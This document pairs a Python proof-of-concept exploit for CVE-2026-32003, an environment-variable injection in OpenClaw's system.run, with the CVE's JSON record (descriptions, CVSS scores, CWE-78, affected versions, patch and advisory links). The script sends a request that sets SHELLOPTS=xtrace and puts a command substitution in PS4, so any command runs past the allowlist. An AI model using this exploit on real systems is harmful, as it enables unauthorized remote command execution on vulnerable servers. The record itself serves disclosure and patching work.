CVE-2026-32003

#!/usr/bin/env python3 # PoC for CVE-2026-32003: OpenClaw Environment Variable Injection import requests import sys def exploit(target_url, command): """ Exploit the environment variable injection to execute arbitrary commands. """ # The vulnerable endpoint is assumed to be /api/system/run endpoint = f"{target_url.rstrip('/')}/api/system/run" # Construct malicious environment variables # SHELLOPTS=xtrace: Enables bash debugging mode # PS4: The prompt used for xtrace, we inject a command substitution here payload = { "command": "ls", # Assuming 'ls' is in the allowlist "env": { "SHELLOPTS": "xtrace", "PS4": f"$({command})" # The malicious payload to be executed } } try: print(f"[*] Sending payload to {endpoint}...") # Sending the crafted request response = requests.post(endpoint, json=payload, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check if command executed.") else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <command>") print(f"Example: python {sys.argv[0]} http://localhost:8080 'touch /tmp/pwned'") sys.exit(1) target = sys.argv[1] cmd = sys.argv[2] exploit(target, cmd)

{"cve": {"id": "CVE-2026-32003", "sourceIdentifier": "[email protected]", "published": "2026-03-19T22:16:32.527", "lastModified": "2026-03-23T18:57:22.013", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.22 contain an environment variable injection vulnerability in the system.run function that allows attackers to bypass command allowlist restrictions via SHELLOPTS and PS4 environment variables. An attacker who can invoke system.run with request-scoped environment variables can execute arbitrary shell commands outside the intended allowlisted command body through bash xtrace expansion."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a 2026.2.22 contienen una vulnerabilidad de inyección de variables de entorno en la función system.run que permite a los atacantes eludir las restricciones de la lista de comandos permitidos a través de las variables de entorno SHELLOPTS y PS4. Un atacante que pueda invocar system.run con variables de entorno de ámbito de solicitud puede ejecutar comandos de shell arbitrarios fuera del cuerpo del comando permitido previsto mediante la expansión xtrace de bash."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.7, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.22", "matchCriteriaId": "6EA3E555-7328-4665-9FBC-BF4357239EDF"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/e80c803fa887f9699ad87a9e906ab5c1ff85bd9a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2fgq-7j6h-9rm4", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-remote-code-execution-via-shellopts-ps4-environment-injection-in-system-run", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}